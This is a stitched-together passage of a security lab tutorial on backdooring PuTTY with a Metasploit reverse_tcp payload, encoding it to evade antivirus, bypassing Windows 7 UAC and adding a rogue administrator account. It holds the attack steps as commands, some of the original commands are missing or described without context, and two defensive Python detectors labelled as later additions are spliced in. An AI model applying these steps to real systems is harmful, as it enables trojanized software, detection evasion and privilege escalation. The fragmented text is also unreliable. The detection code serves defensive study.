(Metasploit: Using msfpayload & msfencode)

{ Kali 1.0: msfencode Putty with msfpayload on Windows 7 }

Section 0. Background Information

What is the scenario?

Have you ever heard about how a malicious perpetrator placed a virus or
backdoor into a game or a very common internet utility? Unfortunately, it is
very simple to do so. The following lab demonstrates how to use msfpayload to
create the backdoor and msfencode to (1) bind the backdoor to Putty.exe (or a
game) and (2) possibly evade anti-virus detection.

What is Metasploit?

The Metasploit Framework is an open source penetration testing tool used for
developing and executing exploit code against a remote target machine.
Metasploit has the world's largest database of public, tested exploits. In
simple words, Metasploit can be used to test the vulnerability of computer
systems in order to protect them; on the other hand, it can also be used to
break into remote systems.

What is msfpayload?

msfpayload is a command line instance of Metasploit that is used to
generate and output all of the various types of shellcode that are
available in Metasploit. The most common use of this tool is for the
generation of shellcode for an exploit that is not currently in the
Metasploit Framework or for testing different types of shellcode and
options before finalizing an Exploit Module.

What is msfencode?

msfencode is another great little tool in the framework's arsenal when it
comes to exploit development. Most of the time, one cannot simply use
shellcode generated straight out of msfpayload. It needs to be encoded to
suit the target in order to function properly. This can mean transforming
your shellcode into pure alphanumeric, getting rid of bad characters, or
encoding it for a 64-bit target.

What is putty?

PuTTY is a free and open-source terminal
emulator, serial console and network file transfer application. It
supports several network protocols, including SCP, SSH, Telnet, rlogin,
and raw socket connection. It can also connect to a serial port (since
version 0.59). The name "PuTTY" has no definitive meaning.

As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.

In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
merchantability."

In addition, this is a teaching website
that does not condone malicious behavior of
any kind.

You are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered malicious and is against the law.

Command #1, Executables like putty.exe must be copied to the templates
directory in order to encode them with msfencode.

Command #2, Create a reverse_tcp payload backdoor using msfpayload that
connects back to Kali (LHOST=192.168.121.158) on port (LPORT=4444).
Use msfencode to bind the reverse_tcp payload backdoor to putty.exe.
Use 3 iterations of shikata_ga_nai encoding to perhaps bypass an
anti-virus product, if one existed on the machine.

Command #3, Make bad_putty executable.

Command #4, List both putty executables.
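A defender's counterpart to the binding step above, added here as an example that is not part of the original lab and not Metasploit's or PuTTY's own code: a pure-Python PE header check that flags two artifacts commonly left behind when a payload is injected into an existing executable, a section that is both writable and executable, and an entry point that no longer lies in the original code section. The sample PE images are constructed inline and cannot run; the assumption that the original code section is named .text is a heuristic, not a guarantee, and a hash comparison against the value published by the PuTTY project remains the authoritative integrity check.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Header layouts from the PE/COFF specification.
COFF_HEADER_FMT = "<HHIIIHH"          # Machine .. Characteristics (20 bytes)
SECTION_HEADER_FMT = "<8sIIIIIIHHI"   # Name .. Characteristics (40 bytes)


def parse_pe(data):
    """Return (entry_point_rva, sections) for a PE image held in memory.

    Each section is a dict with name, virtual_address, virtual_size and
    characteristics. Raises ValueError if the buffer is not a PE file.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, num_sections, _, _, _, size_opt, _ = struct.unpack_from(COFF_HEADER_FMT, data, coff)
    opt = coff + struct.calcsize(COFF_HEADER_FMT)
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    table = opt + size_opt
    sections = []
    for i in range(num_sections):
        fields = struct.unpack_from(SECTION_HEADER_FMT, data, table + i * 40)
        sections.append({
            "name": fields[0].rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": fields[1],
            "virtual_address": fields[2],
            "characteristics": fields[9],
        })
    return entry_point, sections


def find_injection_artifacts(data, code_section=".text"):
    """Return human-readable findings; an empty list means no artifact was seen."""
    entry_point, sections = parse_pe(data)
    findings = []
    for s in sections:
        flags = s["characteristics"]
        if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {s['name']} is writable and executable")
    holder = next((s for s in sections
                   if s["virtual_address"] <= entry_point < s["virtual_address"] + s["virtual_size"]),
                  None)
    if holder is None:
        findings.append(f"entry point 0x{entry_point:x} lies outside every section")
    elif holder["name"] != code_section:
        findings.append(f"entry point 0x{entry_point:x} lies in section {holder['name']}, not {code_section}")
    return findings


def build_sample_pe(sections, entry_point):
    """Build a minimal PE header image for testing (constructed; it cannot run)."""
    opt_size = 96                                   # enough to hold AddressOfEntryPoint
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)         # e_lfanew -> PE signature
    coff = struct.pack(COFF_HEADER_FMT, 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)           # PE32 magic
    struct.pack_into("<I", opt, 16, entry_point)
    table = b"".join(
        struct.pack(SECTION_HEADER_FMT, name.encode("ascii"), vsize, va, vsize, 0, 0, 0, 0, 0, flags)
        for name, va, vsize, flags in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


# Constructed samples: an unmodified layout (code in .text, data read/write)
# and one with an extra read/write/execute section that now owns the entry point.
CLEAN_SAMPLE = build_sample_pe(
    [(".text", 0x1000, 0x5000, 0x60000020), (".data", 0x6000, 0x1000, 0xC0000040)], 0x1100)
INJECTED_SAMPLE = build_sample_pe(
    [(".text", 0x1000, 0x5000, 0x60000020), (".data", 0x6000, 0x1000, 0xC0000040),
     (".inject", 0x7000, 0x1000, 0xE0000020)], 0x7010)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_SAMPLE), ("injected", INJECTED_SAMPLE)):
        print(label, find_injection_artifacts(image) or "no artifacts")
```

To run it against a real file, pass `open(path, "rb").read()` to `find_injection_artifacts`. Legitimate packers and some runtimes also produce writable code sections, so treat a finding as a reason to compare the file's hash with the vendor's published value, not as a verdict on its own.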

Section 9: Start msfconsole and listener

Start A Typescript

Instructions:

script msfconsole_putty.txt

Notes(FYI):

Command #1, Makes a typescript of the terminal session. It is useful for
students who need a hardcopy record of an interactive session as proof of
an assignment. Basically, all input and output will be stored in the file
msfconsole_putty.txt.

Start msfconsole

Instructions:

msfconsole

Note(FYI):

Command #1, The msfconsole provides an "all-in-one" centralized console and
allows you efficient access to virtually all of the options available in
the MSF.

Command #1, Net User is a command-line tool that helps system
administrators view, add, or modify user accounts.

Display Username (student) Details

Instructions:

net users student

Note(FYI):

Command #1, Display the details of the
student user account. Notice that student is part of the
Administrators group.

Account Creation Attempt

Instructions:

net users jhacker abc123 /ADD /FULLNAME:"Johnny Hacker"

View Access denied message.

exit

Note(FYI):

Command #1, Try to create an account (jhacker) with password (abc123) and
the full name (Johnny Hacker).

Notice that even though the student user account belongs to the
Administrators group, this account does not have the ability to create or
modify accounts. The next steps will show you how to escalate privileges
past Windows 7 User Account Control (UAC).

Command #3, Exit the Command Prompt.

Section 12: Escalate User Privilege

Viewing Sessions

Instructions:

background

sessions -l

"l" as in lamb.

Note(FYI):

Command #1, The background command places the current session into the
background and brings us back to the Metasploit console without
terminating the session.

Command #2, sessions -l allows you to view all the established meterpreter
sessions.

Send UAC Bypass

Instructions:

use exploit/windows/local/bypassuac

show options

set SESSION 1

"1" as in the number one.

exploit

Notice the stage being sent and
creation of a new meterpreter connection.

Note(FYI):

Command #1, This is a post-exploitation module that performs a UAC (User
Account Control) protection bypass.

Command #2, Show options. Notice that the SESSION variable needs to be set.

Command #2, The 'getsystem' command allows you to escalate the current
session to the SYSTEM account from an administrator user account. This is
why your general user account should not have administrative privileges.

Command #3, Notice the username is now SYSTEM, which has Administrator
privileges.

Create User / Add to Administrators Group

Instructions:

shell

net users jhacker abc123 /ADD /FULLNAME:"YOUR NAME"

Replace (YOUR NAME) with your actual name.

net localgroup Administrators jhacker /ADD

Note(FYI):

Command #1, From the Meterpreter prompt, drop down into a Windows Command
Prompt.

Command #2, Create a new user (jhacker), set the password (abc123), and
supply the FULLNAME (YOUR NAME). Remember to use your name.

Command #3, Add the new user (jhacker) to the Administrators group.

View Administrators Group

Instructions:

net localgroup Administrators

Note(FYI):

Command #1, Display all users that
belong to the Administrators group. Notice that jhacker is now
a part of that group.

View User Details

Instructions:

net users jhacker

Note(FYI):

Command #1, Display the user (jhacker)
details. You should see your name on the "Full Name" line.
Also, jhacker should belong to the Administrators group.
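From the defender's side, the account creation and Administrators group addition performed in the sections above leave Windows Security events 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group) behind. The following detection logic is added here as an example and is not part of the original lab; it correlates the two over a constructed sample feed (the field names mirror the event data Windows writes, while the host name WIN7-PC, the SIDs and the timestamps are made up) and flags an addition to Administrators when the account is only minutes old or when the change was made from a SYSTEM context, as it is after the UAC bypass and getsystem steps.

```python
from datetime import datetime, timedelta

# Local groups whose membership changes are worth an alert.
PRIVILEGED_GROUPS = {"Administrators"}
# A brand-new account landing in a privileged group this quickly is unusual.
DEFAULT_WINDOW = timedelta(minutes=10)

# Constructed sample events (not real logs). Field names follow the event
# data Windows writes for Security IDs 4720 and 4732; timestamps, the
# WIN7-PC host and the SIDs are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2013-11-02T10:00:00",
     "SubjectUserName": "student", "TargetUserName": "student"},
    {"EventID": 4720, "TimeCreated": "2013-11-02T10:03:10",
     "SubjectUserName": "WIN7-PC$", "TargetUserName": "jhacker"},
    {"EventID": 4732, "TimeCreated": "2013-11-02T10:03:40",
     "SubjectUserName": "WIN7-PC$", "TargetUserName": "Administrators",
     "MemberName": "jhacker", "MemberSid": "S-1-5-21-1111-2222-3333-1005"},
    # Benign control case: an admin creates an account and promotes it a day later.
    {"EventID": 4720, "TimeCreated": "2013-11-02T11:15:00",
     "SubjectUserName": "student", "TargetUserName": "contractor"},
    {"EventID": 4732, "TimeCreated": "2013-11-03T09:00:00",
     "SubjectUserName": "student", "TargetUserName": "Administrators",
     "MemberName": "contractor", "MemberSid": "S-1-5-21-1111-2222-3333-1006"},
]


def find_suspicious_admin_additions(events, window=DEFAULT_WINDOW):
    """Correlate 4720 and 4732 events; return one alert per suspicious addition."""
    created = {}    # account name (lower-case) -> (creation time, creator)
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        t = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"].lower()] = (t, ev["SubjectUserName"])
        elif ev["EventID"] == 4732 and ev["TargetUserName"] in PRIVILEGED_GROUPS:
            member = ev.get("MemberName", "").lower()
            reasons = []
            if member in created and t - created[member][0] <= window:
                age = int((t - created[member][0]).total_seconds())
                reasons.append(f"account was created only {age}s earlier")
            # A subject ending in '$' is the computer account, i.e. the change
            # came from a process running as SYSTEM, not from a logged-on admin.
            if ev["SubjectUserName"].endswith("$"):
                reasons.append("change made from a SYSTEM/computer-account context")
            if reasons:
                alerts.append({"time": ev["TimeCreated"], "account": ev["MemberName"],
                               "group": ev["TargetUserName"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_admin_additions(SAMPLE_EVENTS):
        print(alert["time"], alert["account"], "->", alert["group"],
              "; ".join(alert["reasons"]))
```

On a real host the 4732 event often carries only MemberSid, with MemberName set to "-", so a production version should resolve the SID against the 4720 event's TargetSid before matching by name; the simplified sample feed here fills in MemberName directly.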